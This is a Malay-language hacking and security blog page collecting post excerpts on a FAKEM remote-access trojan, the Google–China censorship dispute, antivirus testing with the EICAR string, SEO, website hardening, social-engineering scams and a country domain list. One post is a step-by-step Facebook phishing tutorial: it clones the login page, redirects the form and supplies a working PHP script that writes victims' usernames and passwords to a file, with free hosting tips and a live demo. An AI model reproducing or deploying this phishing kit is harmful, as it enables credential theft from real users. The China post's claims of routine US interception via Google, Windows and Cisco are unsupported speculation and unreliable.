Berselindung-FAKEM remote acces trojan!

Assalamualaiikum kepada pembaca di gilerhackers! ramai yang tidak mengetahui sebenarnya apa yang dimaksudkan dengan virus dan cara mereka bekerja,[ baca disini info tentang virus ]

Baru baru ini dari trend micro telah mengulas mengenai satu jenis trojan Fakem yang diacces dari jarak jauh tanpa disedari pengguna.

Serangan yang disasarkan mahu mengekalkan kehadiran berterusan didalam rangkaian untuk mengekstrak data sensitif apabila diperlukan.serangan bertujuan bercampuran dengan trafik melalui rangkaian biasa dan port penggunaan yang dibenarkan oleh firewall.

Malware yang digunakan dalam serangan yang disasarkan menggunakan HTTP dan HTTPS untuk kelihatan seperti trafik web biasa. Walau bagaimanapun, alat-alat malware memberi penyerang kawalan penuh ke atas sistem yang dikompromi, Serangan mudah dan dikonfigurasikan untuk menjalankan beberapa arahan .

Beberapa penyerang lebih suka untuk menggunakan Trojan akses jauh (RAT), kadang-kadang sebagai "peringkat kedua" malware, yang biasanya mempunyai grafik (GUIs) dan ciri-ciri desktop jauh yang termasuk melayari direktori, pemindahan fail, keupayaan untuk mengambil screenshot, dan mengaktifkan mikrofon dan kamera web komputer . Tikus (RAT) boleh didapati secara umum seperti Gh0st, PoisonIvy, Hupigon, dan DRAT,.

"ditutup dibebaskan" tikus (RAT) seperti MFC Hunter dan PlugX kedua-duanya adalah dalam penggunaan biasa. Walau bagaimanapun, trafik rangkaian ini mudah untuk dikesan, walaupun penyerang masih berjaya menggunakannya.

---

Advertise by GilerMedia

---

Penyerang sentiasa mencari cara-cara untuk mencampur trafik berniat jahat mereka dengan lalu lintas yang sah untuk mengelakkan pengesanan.keluarga RAT /Tikus yang di panggil "FAKEM" menjadikan trafik rangkaian mereka pelbagai protokol. Beberapa varian cuba untuk menyembunyikan trafik rangkaian untuk kelihatan seperti Windows ® Messenger dan Yahoo! ® Messenger trafik. Varian lain cuba untuk membuat kandungan melihat trafik seperti trafik web biasa. RAT FAKEM nampaknya telah digunakan secara aktif dalam serangan sejak September 2009.

Manakala kaitan antara serangan FAKEM RAT tertentu dan kempen diketahui (terutamanya yang melibatkan Protux), ia masih tidak jelas jika semua serangan yang digunakan malware ini disambungkan. Ia mungkin bahawa terdapat ancaman menggunakan RAT FAKEM.

Walaupun ia adalah mustahil untuk membezakan trafik rangkaian varian RAT FAKEM dari protokol sah mereka bertujuan untuk spoof, didalam konteks rangkaian yang besar tidak mungkin sukar.

{ Continue Reading }

Isu Penapisan Internet. Siapa Rugi? China atau Google?

Cuba jika situasi ini berlaku di negara kita, Malaysia? Google dikatakan akan keluar dari negara China sebagai bantahan di atas tindakan kerajaan China bertindak menapis Perkhidmatan akses Internetnya. Walaupun hanya 30% rakyat China yang menggunakan Google kerana di sana lebih tertumpu mereka lebih tertumpu kepada carian Baidu, tetapi kesan besarnya tetap ada kepada China.

BEIJING 14 Jan. – China akan mengalami kerugian besar, sekiranya Google mengambil keputusan untuk tidak lagi menawarkan perkhidmatan di negara itu berikutan serangan siber serta penapisan Internet, dengan menyatakan bahawa rakyat negara ini seharusnya diberikan hak bebas untuk mengakses maklumat.

“Sekiranya negara paling padat dengan penduduk di dunia ini gagal menyediakan ‘tempat berpijak’ yang selesa buat enjin pencarian terkenal dunia, ia akan mengakibatkan halangan dan kerugian besar kepada budaya Internet China,” lapor akhbar berbahasa Inggeris Global Times yang juga lidah rasmi kepada Parti Komunis.

Laporan itu menyebut, jika syarikat gergasi Amerika Syarikat (AS) yang mempunyai 360 juta pengguna dalam talian di dunia itu keluar dari China, ia akan mengakibatkan ‘kerugian amat besar kepada komitmen jangka panjang inovasi, begitu juga dengan masa depan perniagaan di negara ini. Google kelmarin memaklumkan, syarikat itu tidak akan tunduk lagi kepada penapisan Internet oleh kerajaan China dan berdepan risiko tersingkir daripada pasaran yang menguntungkan ini sebagai membantah serangan siber yang disasarkan kepada aktivis hak manusia di negara ini.

“Lebuh raya maklumat ini bukan sahaja memerlukan pemanduan yang selamat, tetapi juga aliran lalu lintas yang bebas. Untuk kepentingan hak majoriti, aliran maklumat bebas perlu diberi keutamaan kepada masyarakat awam. “Tindakan Google dan China yang berbeza haluan, akan menjejaskan kedua-dua pihak,” lapor Global Times.

China berkata, pihaknya akan mendapatkan penjelasan berhubung pengumuman Google. Usaha mendapatkan ulasan daripada Kementerian Luar, Kementerian Kewangan dan Kementerian Teknologi Maklumat masih belum berhasil. Global Times yang menyiarkan berita tersebut pada muka depannya begitu juga dengan akhbar China Daily melaporkan bahawa sementara penapisan perlu dalam ‘peralihan masyarakat’ seperti di China bagi mengekalkan kestabilan sosial, sempadan tertentu adalah perlu.

“Kerajaan perlu berhadapan cabaran untuk menentukan di mana dan bagaimana untuk meletakkan tempat pemeriksaan dalam ‘lebuh raya maklumat’,” lapor akhbar tersebut. –
AFP

---

*Shield your home from crime and natural disasters in this brand new game and stand to win a 42" LED TV
*Create Malaysia's Own Wonderland Together with Yuna.

---

China boleh dikatakan negara yang berpendirian. Berpendirian sampai bila kita tak tau. Mungkin selepas kena “acah” dengan Google, China akan mengalah. Siapa yang tahu? Mungkin ada sebab musabab China bertindak sebegitu. Untuk sistem komputer military di China contohnya, mereka menggunakan custom made Linux OS aka Red Herring. Semestinya China mementingkan soal keselamatan dan sukar untuk mereka meletakkan sepenuh kepercayaan dengan OS seperti Windows.

Katakanlah Google berniat jahat dengan membuat backdoor movement bertujuan untuk menyebarkan sentimen anti kerajaan China. Contohnya, Kongres America menyuruh Google mengubah hasil carian pengguna Google. Google tu bukan siapa lagi, kroni-kroni rapat Amerika Syarikat juga.

* Search “History of China ” keluar website propaganda anti Parti
* Search “Economy of China ” keluar website propaganda anti Parti

Memang unpredictable (sesuatu yang susah untuk dijangka) tetapi kemungkinan tersebut tetap ada. Contohnya, cuba bayangkan pegawai tinggi MINDEF Amerika membincangkan strategi perang menggunakan Google Talk, platform Windows, aplikasi Firewall dan Cisco. Even kalau anda chat guna Yahoo Messenger tu, sistem admin mereka boleh tahu apa anda komunikasi di YM selama ini. Terkejut bukan? Tetapi itulah hakikat dan kebenarannya. Caranya :

* Google Talk -> capture -> hantar ke US Secret Intel
* MS Windows -> capture packet -> hantar pattern ke US Secret Intel
* Cisco -> capture packet -> hantar ke US secret Intel

Kesan kepada China? Ada…siapa kata tiada. Sebab banyak syarikat besar sana menggunakan aplikasi yang kebanyakan ada pada Google, dan kemungkinan besar terdapat syarikat-syarikat yang mula gulung tikar dan berpindah ke negara lain disebabkan IT limited access. Mungkin itu antara sebabnya Google dilihat bertindak berani mengugut China, sebab banyak pelaburan asing di sana.

P/S : Inilah dinamakan serangan secara halus ke atas China dengan menggunakan psikologi

Diharap Malaysia tidak mengikut jejak langkah China melakukan penapisan Internet sehingga boleh menyebabkan Google menyekat perkhidmatan untuk Malaysia. Minta-minta dijauhkan sekali. Sukar untuk rakyat Malaysia mencari info sebenarnya. Betul tak? Dan ini mungkin satu amaran kepada kerajaan Malaysia sebenarnya dan juga negara-negara yang lain…

Sumber Rujukan beritasemasa

Tags:  no google in china,google,china benci google,google benci china,china poyo

{ Continue Reading }

10 penggodam yang patut anda kenal

APABILA bercerita mengenai penggodam, ramai yang berfikiran negatif kerana menganggap ia suatu perlakuan buruk dan keji.

Sebenarnya penggodam ialah kumpulan yang pakar dalam pengkomputeran.
Namun kumpulan penggodam ini dibahagikan kepada dua golongan iaitu yang dinamakan topi putih dan topi hitam.

Mereka yang digolongkan dalam topi putih biasanya menggodam bagi memastikan sesuatu sistem dalam keadaan selamat.
Penggodam topi hitam pula ialah yang menceroboh sistem komputer tanpa kebenaran pihak berkuasa selalunya dengan niat jahat.

Walaupun penggodaman salah dari segi undang-undang tetapi golongan ini pastinya pintar dan bijak sehingga boleh ‘memecahkan’ tembok keselamatan.


*Hashtag Your Moments With #MakeThatCall and Win An iPhone 5 From Hotlink!
*NABIL + NEELOFA?? Memang MeleTOP!

{ Continue Reading }

Cara Semak Antivirus berfungsi dengan baik atau tidak

Assalamualaiikum kepada semua pembaca di gilerhackers.net,
Diantara salah satu software yang perlu ada disesebuah laptop atau pc adalah ANTIVIRUS.
Apa itu virus? [Baca disini]

Bagaimana untuk memeriksa antivirus di komputer atau laptop anda berfungsi dengan baik atau tidak.dibawah juga bagaimana untuk menyemak sama ada anti virus itu original atau palsu "Fake Antivirus"

Sekarang bukak Notepad pada computer anda dan salin code bewarna merah dibawah. letak di notepada anda:
Code:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

save kan dengan nama WH2.vbs save as type pilih all file
Jika anti virus anda allert dengan file tersebut. sila bersihkan file tersebut dengan antivirus anda.Jika tidak. ini bermakna antivirus yang anda guna tidak berfungsi dengan baik.lebih elok jika anda menukar kepada antivirus yang lain.

Dibawah adalah screenshot MSE. microsoft security esential.

selamat mencuba.

{ Continue Reading }

Ketahui Maksud SEO,black hat SEO atau White Hat SEO

SEO adalah singkatan bagi satu terma teknologi maklumat iaitu Search Engine Optimization.

SEO sering dibincangkan dalam seminar perniagaan internet kerana ia merupakan salah satu strategi pemasaran yang berkesan di internet.

Andaian yang boleh diberikan ialah bagaimana untuk membuat laman web organisasi Y berada dalam senarai carian yang pertama dalam laman web enjin carian seperti Google sekiranya seseorang menaip perkataan 'komputer' di laman web enjin carian Google tersebut? Jadi, ini adalah sebahagian daripada strategi pemasaran di internet.

Terdapat teknik-teknik SEO yang boleh digunakan untuk manipulasi algoritma atau tata cara perjalanan proses bagi sesebuah laman web enjin carian bagi menempatkan kedudukan sesebuah laman web itu di senarai carian yang teratas.

Teknik-teknik SEO ini boleh dibahagikan kepada dua iaitu White Hat SEO dan Black Hat SEO. White Hat SEO adalah teknik-teknik SEO yang digunakan mengikut cara yang dibenarkan oleh sesebuah laman web enjin carian.

Black Hat SEO pula adalah teknik-teknik SEO yang tidak dibenar menggunakannya oleh pihak laman web enjin carian.

Penarafan senarai carian teratas dengan kata kunci tertentu juga boleh dibayar kepada pihak laman web enjin carian untuk mendapatkan tempat yang tertinggi dalam senarai carian tersebut.

Teknik-teknik White Hat SEO yang boleh digunakan adalah seperti penempatan penggunaan kata kunci dengan perkataan tertentu seperti komputer, motivasi dan lain-lain, analisis sambungan atau Link Building Analysis, penggunaan Link Exchanges, Onsite Analysis, penggunaan Meta Tags untuk menempatkan beberapa kata kunci bagi memberi maklumat sesebuah laman web dan lain-lain.

Beberapa teknik Black Hat SEO pula adalah seperti Keyword Stuffing, Page Stuffing, Selling and Farming Link dan lain-lain.

Terdapat juga program-program komputer yang boleh digunakan untuk menjalankan teknik-teknik tertentu dalam perlaksanaan SEO ini.

Program komputer yang digunakan bagi teknik Link Building Analysis adalah seperti Google Alerts, Majestic SEO, Open Site Explorer, OnlyWire, Seesmic Ping, Affiliorama SEO Toolbar dan lain-lain.

Program komputer yang digunakan untuk teknik penggunaan kata kunci pula adalah seperti Google Adwords Keyword Tool, Google Trends, Google Insights for Search, Google Correlate, Google Related Searches, BuzzFeed, Alexa, Soovle, Keyword Discovery, Kgen, Keyword Questions, SearchStats Plugin dan lain-lain.

Seterusnya program komputer yang digunakan untuk teknik Onsite Analysis adalah seperti Google Analytics, Woo Rank, HubSpot Marketing Grader, SEOTools for Excel, SiteTrail for Chrome, SEOQuake, SEOBook, SEO for Chrome dan lain-lain.

SEO adalah satu cara yang digunakan untuk penarafan senarai carian sesebuah laman web bagi carian tertentu dalam laman-laman web enjin carian dengan menggunakan teknik-teknik tertentu yang bersesuaian dengan tata cara sesebuah laman web enjin carian tersebut.

Dengan mendapat kedudukan senarai carian laman web yang tertinggi di sesebuah laman web enjin carian bagi kategori tertentu, ia akan meningkatkan capaian oleh pengunjung sasaran di internet.

Jadi, ini akan meningkatkan promosi dan pemasaran bagi sesebuah perkhidmatan atau produk di internet menerusi laman web organisasi.

Sebagai contoh, apabila pengguna menaip perkataan 'komputer' di laman web Google, alamat laman web http://www.bukharimalek.my akan berada dalam kelompok senaraian lima tertinggi.

Secara automatik atau kebiasaan, pengguna akan cuba masuk ke laman web tersebut.

* Maxis menawarkan pelan wireless broadband terbaru serendah RM48.00

{ Continue Reading }

Elakan Laman Web Dari DIGODAM!

Assalamualaiikum, sebelum anda membaca entri ini,kami ingin memberitahu anda bahawa kami dari keluarga GILERMEDIA mengucapkan selamat tahun baru.Terima kasih kerana menyokong GH sehingga ke hari ini.kami juga membuat beberapa perubahan dilaman ini,ADAKAH ANDA PERSAN?

Dalam ruangan Sembang ICT ini, telah banyak dibincangkan secara umum dan spesifik berkenaan dengan pengendalian keselamatan teknologi maklumat. Jadi, boleh merujuknya kembali artikel-artikel yang lepas.

Perkara asas dalam keselamatan teknologi maklumat yang perlu diambil kira ialah perimeter, pendidikan dan polisi atau 3P.

Berkenaan dengan keselamatan sesebuah laman web, ada beberapa peringkat yang perlu diteliti iaitu seperti yang tercatit seterusnya.

1. Peringkat aplikasi sesebuah laman web iaitu dari segi laman web itu sendiri, perisian, aplikasi pengurusan kandungan atau Content Management System (CMS), penulisan kod, bahasa pengaturacaraan dan pangkalan data.

2. Peringkat aplikasi storan laman web iaitu aplikasi pelayan web dan pelayan DNS yang diguna pakai.

3. Peringkat komputer pelayan yang digunakan untuk menyediakan kemudahan laman web dan komputer peribadi atau client yang digunakan untuk mencapai fungsi pengurusan laman web tersebut.

4. Peringkat capaian daripada para pengguna terhadap laman web dan sambungannya.

Seterusnya, disediakan panduan keselamatan secara umum bagi pengendalian sesebuah laman web sama ada ia bersifat statik, dinamik atau aplikasi.

1. Aplikasi pelayan DNS yang diguna pakai perlu sentiasa dikemas kini, dikonfigurasikan dengan baik, selamat dan dienkripsi sambungannya. Sila guna aplikasi DNS yang mempunyai fungsi DNS Security Extension (DNSSEC) bagi memberi tahap keselamatan yang tinggi.

2. Sentiasa membuat kemas kini terhadap kesemua perisian dan perkakasan yang digunakan untuk mengendalikan dan membangunkan laman web.

3. Pengunaan kata laluan berserta teknik enkripsi yang kental dan selamat dalam kesemua pengendalian sesebuah laman web.

4. Pastikan keselamatan penggunaan e-mel pentadbir yang digunakan dalam mengendalikan laman web adalah pada tahap yang tinggi. Jangan dedahkannya kepada umum sekiranya tiada berkepentingan.

5. Penggunaan kata laluan yang selamat dan kental pada pangkalan data yang digunakan. Ramai pengguna membiarkan capaiannya tanpa kata laluan.

6. Elakkan konfigurasi secara lalai atau default pada mana-mana aplikasi yang digunakan terutama pada pelayan web, pangkalan data, aplikasi pengurusan kandungan, blog, skrip dan sebagainya. Konfigur kesemuanya dengan selamat.

7. Elakkan penggunaan aplikasi Telnet, aplikasi FTP dan sambungan Wi-Fi untuk mencapai pengurusan laman web secara jarak jauh kerana ia kurang selamat. Boleh menggunakan aplikasi yang mempunyai fungsi enkripsi seperti Secure FTP (SFTP), VPN dan lain-lain dalam menggunakan aplikasi capaian jarak jauh.

8. Semak kebenaran capaian fail dan direktori agar capaiannya selamat dan terhad oleh pihak yang bertangungjawab sahaja terutama fail dan direktori yang berada dalam aplikasi pelayan web.

9. Tambahkan skrip robot.txt kepada laman web. Ia adalah skrip arahan untuk laman-laman web enjin carian yang akan mengindeks fail tertentu sahaja bagi sesebuah laman web yang dicari oleh para pengguna.

10. Pastikan komputer pelayan yang digunakan dikonfigur pada tahap keselamatan yang tinggi. Sentiasa membuat kemas kini dan penyelengaraan bagi perisian dan sistem pengoperasian yang digunakan secara berkala. Elak larikan komputer pelayan dalam mod penuh pentadbir atau Root.

11. Penggunaan perimeter keselamatan pada infrastruktur laman web seperti aplikasi Firewall Web, IDS, IPS, perisian anti-virus dan lain-lain. Konfigur dengan selamat dan sentiasa mengemaskini aplikasi yang digunakan.

12. Sentiasa melakukan pengujian keselamatan bagi laman web dengan menggunakan aplikasi-aplikasi tertentu seperti PHP Security Scanner, Web Security Testing, XSS String Encoder, SQL Encoder dan lain-lain atau secara manual. Ini juga dikenali sebagai Penetration Testing dan Security Audit. Ia boleh diuji kepada kod sumber, perisian, perkakasan dan capaian yang digunakan untuk sesebuah laman web.

13. Pastikan aplikasi pelayan web yang digunakan dikonfigur pada tahap keselamatan yang tinggi. Sentiasa membuat kemas kini dan penyelengaraan secara berkala. Pastikan aplikasi pelayan web menggunakan fungsi enkripsi SSL untuk keselamatan paparan sesebuah laman web.

14. Pastikan pengguna yang mencapai laman web dididik dengan cara penggunaan yang berhemah dan selamat seperti sambungan, penggunaan pelayar yang selamat, penggunaan akaun laman web dengan selamat dan lain-lain.

15. Wujudkan polisi keselamatan bagi capaian laman web secara dalaman atau secara luaran.

16. Penggunaan keselamatan fizikal yang baik untuk storan laman web seperti keadaan bilik yang kondusif dan selamat, teknik penguncian yang baik dan lain-lain.

17. Wujudkan sistem salinan data untuk kembalikan semula keadaan dan data sesebuah laman web ke bentuk asal sekiranya berlaku perkara-perkara yang tidak diingini. Ini dikenali sebagai Bussiness Continuity Plan (BCP).

{ Continue Reading }

Selamatkan akaun facebook,email,etc dari serangan social engineering

Sebelum itu, mungkin ramai yang tidak tahu bahawa akau facebook boleh digodam dengan menggunakan kaedah recover Method, hanya dengan beberapa langkah mudah,anda sudah boleh menceroboh akaun mangsa tetapi perlu mengambil masa hanya 1 jam untuk berfungsi.

okey. ikut step by step di bawah:

step 1 : bukak email anda dan tekan compose message..
tulis di bahagian subject RETRIEVE LOST PASSWORD

step 2 : copy url ini
/facebook.managment/systemrecovery/cgi-bin/recovery/acc/recfb38

(paste kan di ruangan email anda)

step 3 : dibahgian message email isikan step a,b,c
cth seperti dibawah

A- Login: (email mangsa yang ingin digodam)
B- Current E-mail: (email anda )
C- Password: (password email anda )

step 4 : send email itu kepada security facebook : fbpass_recover@aol.com
tunggu selama 1 jam password email yg diminta itu akan di hantar ke email anda
HATI HATI ANDA DALAM RISIKO DIGODAM JIKA ANDA MELAKUKANNYA!

KENAPA?
diatas adalah bagaimana serangan social engineering yang dilakukan penggodam untuk mencuri maklumat seperti, password,email,no akaun bank,no pin dan banyak lagi.

1.jikan anda menghantar email seperti diatas. secara langsung anda telah memberi maklumat anda seperti email dan password anda kepada penggodam dengan menghantar kepada email  fbpass_recover@aol.com <- Ya! itu adalah email penggodam! .

2.kebanyakan laman web yang berprofile tinggi akan menggunakan email domain mereka sendiri, contoh seperti facebook, email mereka mungkin seperti help@facebook.com .

3.Kebanyakan rakyat malaysia masih tidak peka dengan taktik serangan penggodam seperti diatas. GH berharap artikel ini dapat membantu dan memberi sedikit informasi kepada anda.

{ Continue Reading }

Cara Phising Facebook berfungsi (live demo dengan tutorial Step by Step)

Assalamualaiikum kepada pembaca di gilerhackers.net
kami menerima email permintaan dari seorang rakan di gilermedia, Muhammad Naim Hanafi untuk menyediakan tutorial cara cara membuat phising facebook, twitter dan sebagainya,kerana beliau perlu menyiapkan assignment yang diberikan di kolej beliau.

Tanpa membuang masa, Mari kita ikuti tutorial step by step dibawah,
petama sekali,untuk membuat phising , anda hendaklah mempunyai webhosting  terlebih dahulu.
diantara website yang menyediakan perkhidmatan webhosting secara percuma:
1. 1freehosting.com
2.2freehosting.com
3.x90x.net
pilih salah satu link diatas.

Step ke 2, setelah selesai akaun freehosting anda. pergi ke http://facebook.com/login.php kemudian right click dan view source atau lebih mudah dengan menekan ctrl+u untuk melihat source code.

Step 3.

Copy semua source code dan paste di note pad di pc anda.kemudian cari perkataan action="https://www.facebook.com/login.php?login_attempt=1" method="post"

dan gantikan seperti dibawah

action="next.php" method="get"

Setelah selesai menukar, save file dengan nama index.php type sila pilih all file


Step 4.
buka lagi notepad dan copy code php dibawah dan save dengan nama next.php  type pilih all file

<?php
header("Location: http://www.facebook.com");
$handle = fopen("troll.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

keterangan,
1. perkataan bewarna merah adalah bertujuan halaman yang ingin dituju selepas submit button ditekan
2.perkataan bewarna purple adalah bertujuan untuk melihat email dan password mangsa.

Step 5.
Setelah selesai membuat file index.php dan next.php, upload ke 2 file tersebuat pada webhosting yang telah anda daftar tadi (upload pada public_html)


Untuk Live demo laman phsing sila click disini (facebook phising page)
untuk live demo password mangsa sila click disini (facebook phising password)

Jika anda masih tidak faham dengan tutorial diatas, sila tinggalkan komen pada kotak Disquss Sahaja.

{ Continue Reading }

Fokus Malaysian Software Testing Board (MSTB)

Kemahiran teknikal sememangnya merupakan salah satu prasyarat dalam amalan pengujian sebarang jenis perisian.

Untuk mencapai kecemerlangan pengujian tersebut, kemahiran insaniah yang kukuh amat perlu.

Justeru, Malaysian Software Testing Board (MSTB) maju selangkah kehadapan menawarkan satu badan khas bagi mengkaji dan menguji apa jua perisian yang dicipta bagi memastikan ia selamat serta berbaloi untuk beroperasi.

Di negara ini, industri perisian dan aplikasi sedang giat berkembang sama ada untuk kegunaan umum mahupun kegunaan pihak industri.

Ini sejajar dengan kadar perkembangan teknologi ICT yang juga pantas bergerak di, namun sejauh mana tahap kualiti, keselamatan, keberkesanan dan standard setiap aplikasi atau perisian yang dihasilkan?

Menurut Presiden MSTB, Mastura Abu Samah, pengujian bagi setiap perisian yang telah dihasilkan adalah amat perlu sebelum ia digunakan.

Katanya, ia bagi mengelakkan sebarang kejadian yang tidak diingini berlaku sekali gus mampu meletakkan tahap atau standard tertentu setiap perisian yang dihasilkan.

"Ia bukan sahaja baik untuk pereka sesebuah perisian iaitu dalam bentuk penambahbaikan malah ujian juga dapat memastikan sesebuah perisian itu layak untuk digunakan.

"Namun, untuk melaksanakan ujian, pastinya agensi yang menjadi menguji perlu memiliki kemahiran dan pemahaman yang tinggi dalam bidang tersebut," ujarnya ketika ditemui di pejabat MSTB, di Puchong, Selangor baru-baru ini.

MSTB bergerak sebagai sebuah agensi yang bertanggung jawab dalam melaksanakan pelbagai ujian menyedari tanpa sokongan serta pengalaman sukar bagi pihaknya untuk mengekalkan kualiti pengujian yang dilakukan.

"Setiap hari teknologi berkembang pesat, begitu juga dengan penciptaan pelbagai perisian dan aplikasi, justeru, pihak yang menjalankan ujian juga perlu sentiasa meningkatkan pengetahuan, pengalaman serta kemahiran.

"Salah satu daripada caranya adalah dengan berkongsi teknologi, kemahiran serta pengetahuan dengan tenaga pakar sama ada dari dalam mahupun luar negara," katanya.

Untuk menjayakan perkongsian tersebut, MSTB selaku agensi yang bertanggungjawab telah mengadakan sebuah persidangan yang dikenali sebagai SOFTEC 2012 baru-baru ini.

Persidangan yang melibatkan penguji profesional dari luar negara tersebut bukanlah kali pertama diadakan, malah 2012 merupakan tahun kelima di mana ia diadakan.

Jelas Mastura, seramai 14 pakar terkenal di peringkat antarabangsa, pengamal dan pemimpin pemikir telah hadir dan menyampaikan ilmu dan berkongsi pengalaman melalui 20 sesi tutorial dan bengkel.

Bertemakan The Art of Testing (Seni Pengujian), SOFTEC 2012 merupakan platform bagi perwakilan untuk memperoleh pemahaman yang lebih baik berkenaan selok belok amalan pengujian.

Antara yang menjadi tumpuan adalah teknik pengujian, aplikasi teknik yang berkesan serta kemahiran insaniah lain yang menyumbang kepada projek dan amalan pengujian yang berjaya.

"Salah satu objektif SOFTEC 2012 yang dianjujrkan adalah meningkatkan tahap kemahiran pengujian perisian di kalangan golongan profesional perisian kita.

"SOFTEC merupakan platform terbaik untuk profesional perisian dan pengurus perniagaan mengikuti trend dan perkembangan terbaru dalam industri," ujarnya.

Mastura menambah, pada masa yang sama, SOFTEC juga berfungsi sebagai platform untuk menegaskan kepentingan dan kerelevenan pengujian perisian serta kualiti perisian kepada semua organisasi sama ada kepada pengeluar mahupun pengguna.

Malah, untuk memperkayakan kandungan pada persidangan tersebut, pihaknya turut memperkenalkan ciri baru yang dikenali sebagai Makmal Ujian.

Makmal Ujian tersebut telah memberi peluang kepada perwakilan mendapat pendedahan kepada alatan pengujian yang digunakan.

Dalam pada itu, pada persidangan SOFTEC tersebut juga buat pertama kalinya disertai oleh beberapa universiti tempatan melalui kolokium Bengkel Penyelidikan Pascasiswazah.

MSTB telah menganjurkan persidangan tahunan SOFTEC sejak tahun 2008 dan acara tersebut telah berkembang menjadi acara pengujian perisian yang utama di rantau Asia.

Persidangan tersebut juga turut menerima sokongan daripada ahli Asian Software Testing Alliance (ASTA) serta negara melalui Kementerian Sains, Teknologi dan Inovasi (MOSTI) serta Unit Perancangan Ekonomi (EPU) di Jabatan Perdana Menteri.

{ Continue Reading }

Senarai Nama Domain Mengikut Negara

1. .ac - Ascension Island
2. .ad - Andorra
3. .ae - United Arab Emirates
4. .af - Afghanistan
5. .ag - Antigua and Barbuda
6. .ai - Anguilla
7. .al - Albania
8. .am - Armenia
9. .an - Netherlands Antilles
10. .ao - Angola
11. .aq - Antarctica
12. .ar - Argentina
13. .as - American Samoa
14. .at - Austria
15. .au - Australia
16. .aw - Aruba
17. .ax - Åland
18. .az - Azerbaijan
19. .ba - Bosnia and Herzegovina
20. .bb - Barbados
21. .bd - Bangladesh
22. .be - Belgium
23. .bf - Burkina Faso
24. .bg - Bulgaria
25. .bh - Bahrain
26. .bi Burundi
27. .bj Benin
28. .bm Bermuda
29. .bn Brunei Darussalam
30. .bo Bolivia
31. .br Brazil
32. .bs Bahamas
33. .bt Bhutan
34. .bv Bouvet Island
35. .bw Botswana
36. .by - Belarus
37. .bz - Belize
38. .ca - Canada
39. .cc - Cocos (Keeling) Islands
40. .cd - Democratic Republic of the Congo
41. .cf - Central African Republic
42. .cg - Republic of the Congo
43. .ch - Switzerland
44. .ci - Côte d’Ivoire
45. .ck - Cook Islands
46. .cl - Chile
47. .cm - Cameroon
48. .cn - Untuk Hong Kong dan Macau dgn menggunakan TLD berbeza.
49. .co - Colombia
50. .cr - Costa Rica
51. .cu - Cuba
52. .cv - Cape Verde
53. .cx - Christmas Island
54. .cy - Cyprus
55. .cz - Czech Republic
56. .de - Germany (Deutschland)
57. .dj - Djibouti
58. .dk - Denmark
59. .dm - Dominica
60. .do - Dominican Republic
61. .dz - Algeria (Dzayer)
62. .ec - Ecuador
63. .ee - Estonia
64. .eg - Egypt
65. .er - Eritrea
66. .es - Spain (España)
67. .et - Ethiopia
68. .eu - European Union
69. .fi - Finland
70. .fj - Fiji
71. .fk - Falkland Islands
72. .fm - Federated States of Micronesia
73. .fo - Faroe Islands
74. .fr - France
75. .ga - Gabon
76. .gb - United Kingdom (Jarang digunakan. Primary ccTLD yang sering digunakan ialah .uk)
77. .gd - Grenada
78. .ge - Georgia
79. .gf - French Guiana
80. .gg - Guernsey
81. .gh - Ghana
82. .gi - Gibraltar
83. .gl - Greenland
84. .gm - The Gambia
85. .gn - Guinea
86. .gp - Guadeloupe
87. .gq - Equatorial Guinea
88. .gr - Greece
89. .gs - South Georgia & the South Sandwich Islands
90. .gt - Guatemala
91. .gu - Guam
92. .gw - Guinea-Bissau
93. .gy - Guyana
94. .hk - Hong Kong (Special administrative region dari People’s Republic of China)
95. .hm - Heard Island and McDonald Islands
96. .hn - Honduras
97. .hr - Croatia (Hrvatska)
98. .ht - Haiti
99. .hu - Hungary
100. .id - Indonesia
101. .ie - Ireland (Éire)
102. .il - Israel
103. .im - Isle of Man
104. .in - India
105. .io - British Indian Ocean Territory
106. .iq - Iraq
107. .ir - Iran
108. .is - Iceland (Ísland)
109. .it - Italy
110. .je - Jersey
111. .jm - Jamaica
112. .jo - Jordan
113. .jp - Japan
114. .ke - Kenya
115. .kg - Kyrgyzstan
116. .kh - Cambodia (Khmer)
117. .ki - Kiribati
118. .km - Comoros
119. .kn - Saint Kitts and Nevis
120. .kp - North Korea
121. .kr - South Korea
122. .kw - Kuwait
123. .ky - Cayman Islands
124. .kz - Kazakhstan
125. .la - Laos (Kini dipasarkan sebagai domain official untuk Los Angeles)
126. .lb - Lebanon
127. .lc - Saint Lucia
128. .li - Liechtenstein
129. .lk - Sri Lanka
130. .lr - Liberia
131. .ls - Lesotho
132. .lt - Lithuania
133. .lu - Luxembourg
134. .lv - Latvia
135. .ly - Libya
136. .ma - Morocco
137. .mc - Monaco
138. .md - Moldova
139. .me - Montenegro
140. .mg - Madagascar
141. .mh - Marshall Islands
142. .mk - Republic of Macedonia
143. .ml - Mali
144. .mm - Myanmar
145. .mn - Mongolia
146. .mo - Macau (Special administrative region dari People’s Republic of China)
147. .mp - Northern Mariana Islands
148. .mq - Martinique
149. .mr - Mauritania
150. .ms - Montserrat
151. .mt - Malta
152. .mu - Mauritius
153. .mv - Maldives
154. .mw - Malawi
155. .mx - Mexico
156. .my - Malaysia
157. .mz - Mozambique
158. .na - Namibia
159. .nc - New Caledonia
160. .ne - Niger
161. .nf - Norfolk Island
162. .ng - Nigeria
163. .ni - Nicaragua
164. .nl - Netherlands
165. .no - Norway
166. .np - Nepal
167. .nr - Nauru
168. .nu - Niue (Biasa digunakan untuk website-website Scandinavian dan Dutch, kerana dalam bahasa mereka ‘nu’ bermaksud ‘now’)
169. .nz - New Zealand
170. .om - Oman
171. .pa - Panama
172. .pe - Peru
173. .pf - French Polynesia & Clipperton Island
174. .pg - Papua New Guinea
175. .ph - Philippines
176. .pk - Pakistan
177. .pl - Poland
178. .pm - Saint-Pierre and Miquelon
179. .pn - Pitcairn Islands
180. .pr - Puerto Rico
181. .ps - Palestinian (Kawasan di bawah jagaan PA yang meliputi Tebing Barat dan Semenanjung Gaza)
182. .pt - Portugal
183. .pw - Palau
184. .py - Paraguay
185. .qa - Qatar
186. .re - Réunion
187. .ro - Romania
188. .rs - Serbia
189. .ru - Russia
190. .rw - Rwanda
191. .sa - Saudi Arabia
192. .sb - Solomon Islands
193. .sc - Seychelles
194. .sd - Sudan
195. .se - Sweden
196. .sg - Singapore
197. .sh - Saint Helena
198. .si - Slovenia
199. .sj - Svalbard dan Jan Mayen
200. .sk - Slovakia
